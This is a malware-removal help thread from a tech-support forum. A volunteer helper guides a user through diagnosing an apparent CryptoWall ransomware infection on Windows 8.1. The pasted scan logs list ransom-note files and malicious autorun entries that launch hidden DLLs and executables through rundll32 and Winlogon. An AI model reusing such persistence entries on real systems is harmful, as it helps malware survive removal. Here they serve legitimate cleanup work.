[2015/02/21 03:30:59 | 000,023,552 | ---- | M] () -- C:\Users\Dorothy01\AppData\Local\pgkunge.dll
[2015/02/21 03:14:12 | 000,045,752 | ---- | M] () -- C:\HELP_DECRYPT.PNG
[2015/02/21 03:14:12 | 000,000,292 | ---- | M] () -- C:\HELP_DECRYPT.URL
[2015/02/20 19:18:37 | 000,037,624 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\TrueSight.sys
[2015/02/20 18:55:48 | 000,000,918 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/02/20 18:46:34 | 000,000,922 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/02/19 22:03:44 | 000,002,305 | ---- | M] () -- C:\Users\Dorothy01\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/02/19 21:49:23 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\MBAMSwissArmy.sys
[2015/02/19 21:27:48 | 000,001,982 | ---- | M] () -- C:\Users\Public\Desktop\Avast Free Antivirus.lnk
[2015/02/19 21:27:38 | 001,050,432 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswsnx.sys
[2015/02/19 21:27:17 | 000,000,350 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2015/02/19 21:27:14 | 000,083,280 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswmonflt.sys
[2015/02/19 21:20:09 | 000,002,281 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/02/19 21:17:47 | 000,436,624 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswSP.sys
[2015/02/19 21:17:47 | 000,364,512 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\aswBoot.exe
[2015/02/19 21:17:47 | 000,267,632 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\aswVmm.sys
[2015/02/19 21:17:47 | 000,065,776 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\aswRvrt.sys
[2015/02/19 21:17:47 | 000,029,208 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\aswHwid.sys
[2015/02/19 21:17:46 | 000,043,152 | ---- | M] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2015/02/19 21:07:04 | 000,023,552 | ---- | M] () -- C:\Users\Dorothy01\AppData\Local\pckunie.dll
[2015/02/19 18:15:42 | 000,003,180 | ---- | M] () -- C:\WINDOWS\SysWow64\InstallUtil.InstallLog
[2015/02/18 16:52:33 | 000,001,120 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/02/18 16:48:30 | 000,000,836 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/02/09 16:56:22 | 000,000,000 | -H-- | M] () -- C:\WINDOWS\SysNative\drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
[2015/02/01 20:32:48 | 000,000,384 | -H-- | M] () -- C:\ProgramData\@system3.att
[2015/02/01 20:32:32 | 000,000,648 | ---- | M] () -- C:\ProgramData\@system.temp
 
========== Files Created - No Company Name ==========
 
[2015/02/21 06:48:19 | 000,045,610 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG
[2015/02/21 06:48:19 | 000,008,630 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML
[2015/02/21 06:48:19 | 000,000,292 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL
[2015/02/21 03:30:59 | 000,023,552 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\pgkunge.dll
[2015/02/20 06:41:31 | 000,000,922 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/02/20 06:07:51 | 000,037,624 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\TrueSight.sys
[2015/02/19 21:27:48 | 000,001,982 | ---- | C] () -- C:\Users\Public\Desktop\Avast Free Antivirus.lnk
[2015/02/19 21:20:55 | 000,000,350 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2015/02/19 21:20:09 | 000,002,305 | ---- | C] () -- C:\Users\Dorothy01\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/02/19 21:20:09 | 000,002,281 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/02/19 21:18:11 | 000,000,918 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/02/19 21:17:51 | 000,267,632 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\aswVmm.sys
[2015/02/19 21:17:51 | 000,065,776 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\aswRvrt.sys
[2015/02/19 21:17:51 | 000,029,208 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\aswHwid.sys
[2015/02/19 21:10:53 | 000,045,752 | ---- | C] () -- C:\HELP_DECRYPT.PNG
[2015/02/19 21:10:53 | 000,000,292 | ---- | C] () -- C:\HELP_DECRYPT.URL
[2015/02/19 21:07:04 | 000,023,552 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\pckunie.dll
[2015/02/19 18:15:33 | 000,003,180 | ---- | C] () -- C:\WINDOWS\SysWow64\InstallUtil.InstallLog
[2015/02/18 16:52:33 | 000,001,120 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/02/18 16:48:30 | 000,000,836 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/02/11 17:53:10 | 001,002,728 | ---- | C] () -- C:\WINDOWS\SysNative\WinUSBCoInstaller2.dll
[2015/02/11 17:53:09 | 001,721,576 | ---- | C] () -- C:\WINDOWS\SysNative\WdfCoInstaller01009.dll
[2015/02/11 17:53:08 | 000,821,544 | ---- | C] () -- C:\WINDOWS\adb.exe
[2015/02/09 16:56:22 | 000,000,000 | -H-- | C] () -- C:\WINDOWS\SysNative\drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
[2015/01/12 15:11:10 | 000,008,562 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
[2015/01/12 15:11:10 | 000,001,270 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
[2015/01/12 15:10:39 | 000,008,562 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
[2015/01/12 15:10:39 | 000,001,270 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
[2015/01/12 15:09:31 | 000,008,562 | ---- | C] () -- C:\ProgramData\HELP_DECRYPT.HTML
[2015/01/12 15:09:31 | 000,001,270 | ---- | C] () -- C:\ProgramData\HELP_DECRYPT.PNG
[2015/01/05 14:15:04 | 000,015,872 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\cowitches.d
[2014/12/11 09:44:09 | 000,929,536 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
[2014/11/21 18:59:05 | 000,037,439 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\893686b8
[2014/11/21 18:59:05 | 000,026,477 | ---- | C] () -- C:\ProgramData\893686b8
[2014/11/21 18:59:05 | 000,022,327 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\893686b8
[2014/11/13 18:51:56 | 000,000,288 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
[2014/11/12 18:01:46 | 000,008,542 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
[2014/11/12 18:01:34 | 000,008,542 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
[2014/11/10 16:30:49 | 000,000,384 | -H-- | C] () -- C:\ProgramData\@system3.att
[2014/11/10 16:30:21 | 000,000,648 | ---- | C] () -- C:\ProgramData\@system.temp
[2014/10/14 09:39:07 | 000,930,400 | ---- | C] () -- C:\WINDOWS\SysWow64\PerfStringBackup.INI
[2014/10/14 09:34:22 | 000,000,000 | ---- | C] () -- C:\WINDOWS\ativpsrm.bin
[2014/09/24 01:24:06 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/09/24 01:23:34 | 000,103,936 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2014/07/23 18:32:36 | 000,000,466 | ---- | C] () -- C:\WINDOWS\pirchutl.ini
[2014/07/23 18:32:36 | 000,000,060 | ---- | C] () -- C:\WINDOWS\pident.ini
[2014/07/23 15:49:01 | 000,000,043 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\WB.CFG
[2014/07/21 23:04:58 | 000,204,952 | ---- | C] () -- C:\WINDOWS\SysWow64\ativvsvl.dat
[2014/07/21 23:04:58 | 000,157,144 | ---- | C] () -- C:\WINDOWS\SysWow64\ativvsva.dat
[2014/07/21 23:04:46 | 000,003,917 | ---- | C] () -- C:\WINDOWS\SysWow64\atipblag.dat
[2014/07/21 23:04:04 | 000,995,342 | ---- | C] () -- C:\WINDOWS\SysWow64\amdocl_as32.exe
[2014/07/21 23:04:04 | 000,798,734 | ---- | C] () -- C:\WINDOWS\SysWow64\amdocl_ld32.exe
[2014/07/21 23:03:42 | 000,123,392 | ---- | C] () -- C:\WINDOWS\SysWow64\amdhdl32.dll
[2013/08/22 09:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/22 09:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 08:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 01:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/21 21:32:36 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2013/08/21 17:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/21 17:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/09/01 00:08:59 | 000,000,141 | ---- | C] () -- C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc
 
========== ZeroAccess Check ==========
 
[2015/02/19 18:15:28 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/09/24 01:33:02 | 021,266,336 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/09/24 01:33:14 | 018,760,328 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013/08/22 03:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2013/08/21 20:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013/08/22 03:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2015/02/19 23:28:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Adhoxi
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Amcyocut
[2015/02/19 22:04:32 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\AVAST Software
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Byloaq
[2014/11/07 16:59:34 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\cfdrgbhf
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ciokov
[2014/10/22 16:04:06 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\dgTemp
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Edutsoix
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Egewtoi
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ekmiys
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Esisgyl
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ezrydu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate7
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Fuwutee
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Fyarxy
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Gynika
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Hovoote
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Huqokayx
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Hyipfy
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ihywkead
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Itsefo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Itufefv
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Kuseyd
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Kybeuv
[2014/12/25 15:50:39 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Local Store
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Mawywopo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Maypyz
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Obmukany
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ohvyev
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Onpyym
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Pevyliu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Qaedxa
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ruyxku
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Senyzayr
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Sequefb
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Tapyara
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ucucni
[2015/02/19 23:28:23 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\unpacked23206
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Upvukyy
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Veepme
[2014/09/07 12:18:02 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\WebApp
[2014/10/13 06:38:25 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\WildTangent
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Wiudiz
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Woakduwa
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Wuwuec
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Yhohybe
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ynopqual
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ytbynede
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Zacosia
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Zekubuab
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
 
========== Purity Check ==========
 
 
 
========== Files - Unicode (All) ==========
[2014/11/10 16:30:02 | 000,000,448 | -H-- | M] ()(C:\Users\Dorothy01\AppData\Roaming\????) -- C:\Users\Dorothy01\AppData\Roaming\麽鎒駓覜
[2014/11/10 16:30:02 | 000,000,448 | -H-- | C] ()(C:\Users\Dorothy01\AppData\Roaming\????) -- C:\Users\Dorothy01\AppData\Roaming\麽鎒駓覜
 
< End of report >
 



#2
dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts
Hi allforhimblog,

Welcome to Geeks to Go. My name is dbreeze and I'll be helping you with this problem. Before I get into the removal of malware / correction of your problem, I need you to be aware of the following:
  • Please read all of my response through at least once before attempting to follow the procedures described. I would recommend printing them out, if you can, as you can check off each step as you complete it. Also, as some of the cleaning may be done in Safe Mode and there will be no internet connection then, you will find that having the steps printed for reference speeds the cleaning process along. If there's anything you don't understand or isn't totally clear to you, please come back to me for clarification before you start those steps.
  • All of the assistants and staff at Geeks to Go are here on a volunteer basis; please respect our time given to the cause of helping others. If you are going to be away for more than 4 days, please let me know here. (I will do the same for you.) We do realize that 'life happens' and situations arise unexpectedly; we just ask that you keep us up to date. That being said, please notice the following Geeks to Go rule:
  • Posts that are not replied to in four (4) days will result in the topic being closed. We have not forgotten you; this is just an effort to keep the boards organized and flowing. To continue on your closed topic, please PM me or any Moderator to have the topic reactivated. If, at any time during our working together, I have not responded to you in 2 days (48 hours), then please PM me.
  • Malware removal is a complex, multiple step process; please stay with me on this thread (don't start another thread) until I declare that your logs are clean and you are good to go. The absence of apparent issues does not mean your system is clean; I will tell you when everything looks good for you to go and help you remove the tools we have used.
  • If any of the security programs on your system should give any warnings about the software tools I ask you to download and use, please do not be alarmed. All of the tools I will have you use are safe to use (as instructed) and malware free.
  • While we strive to disrupt your system as little as possible, things happen. If you can, it would be best to back up your personal files now (if you do not already have a backup). You can store these on a CD/DVD, USB drive or stick, anywhere but on your same system. This will save you from possible anguish later if something unforeseen happens.
  • Please do not run any other tools or scanners than what I ask you to. Some of the openly available software made for malware removal can make changes to your system that interfere with the cleaning of the malware, or even destroy your system. I will use only what the situation calls for and direct you in the proper use of that software.
  • Please do not attach any log files to your replies unless I specifically ask you. Instead please copy and paste so as to include the log in your reply. You can do this in separate posts if it's easier for you.
Let's get started....


FIRST >>>>

I see a hint that there maybe was or is some ransomware on this system; please run the following tool as a check.

Scan with IDTool

Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.
  • Enter the IDTool directory, right-click on the IDTool icon and select Run as Administrator to start the tool.
  • IDTool needs the Microsoft .NET Framework environment to work properly, so if prompted to download & install it, please agree.
  • Wait patiently until the tool collects the necessary data.
  • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
  • When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
  • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.
Please include those contents in your next reply.


SECOND >>>>

I appreciate the OTL scan but for Win8 we prefer the following tool. Also, please make sure it is run from the desktop.

Please download Farbar Recovery Scan Tool 64bit and save it to your Desktop.
  • Right click the FRST file on your desktop and select "Run as Administrator..." (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • If an update is available, the program will inform you and download the update. Allow it to do this, please.
  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste the log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Information to Reply with >>>>
  • The Ransomware IDTool log file.
  • The FRST.txt log file text.
  • The Addition.txt log file text.
  • Any concerns or questions you may have.


#3
allforhimblog

    Member

  • Topic Starter
  • 98 posts

You are absolutely right about there being ransomware on here. When I booted back up in normal mode and connected to the internet, 4 files were downloaded automatically (a Help_Decrypt picture, .txt file, .html file and .url file), the screen went purple and then it popped up saying my files had been encrypted and junk. I was able to alt+ctrl+delete and bring up Task Manager, turned off some startup programs that didn't look familiar and was able to sign out and back in to do the scans. Thanks for the quick reply and attached are the requested logs!

 

IDTool Log

Infection Detection Tool v1.6 - Nathan Scott
--------------------------------------------
Date/Time: 2/21/2015 10:37:41 PM
Operating System: Windows 8
Service Pack: N/A
Version Number: 6.2
Product Type: Workstation
--------------------------------------------
[Detected Flags]
1.|  Possible CryptoWall Flag , HKCU\Software\D459277330F21B8C46B7BA72B04D3BE0\002344677ABBBBDE

 

 
 
FRST.TXT
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 21-02-2015
Ran by Dorothy01 (administrator) on DOROTHY on 21-02-2015 22:39:57
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Platform: Windows 8.1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccsvchst.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccsvchst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteUser.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6549136 2012-07-02] (Realtek Semiconductor)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CLMLServer_For_P2G8] => c:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [111120 2012-06-07] (CyberLink)
HKLM-x32\...\Run: [CLVirtualDrive] => c:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491120 2012-07-02] (CyberLink Corp.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227112 2015-02-19] (AVAST Software)
HKLM-x32\...\Run: [CrashReportSaver] => C:\WINDOWS\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe [1464320 2015-02-20] (EFD Software)
Winlogon\Notify\pckunie-x32: C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
Winlogon\Notify\pgkunge-x32: C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [Driver Support] => C:\Program Files (x86)\Driver Support\Driver Support\DriverSupport.exe /applicationMode:systemTray /showWelcome:false
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [acikmao] => rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao <===== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [dccwmote] => C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe [406016 2015-02-21] () <===== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [BluetoothS] => rundll32.exe "%appdata%\BtvStack.dll",BTHF_Register
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\MountPoints2: {5042c0a6-b247-11e4-bed4-089e013a632b} - "G:\AutoRun.exe" 
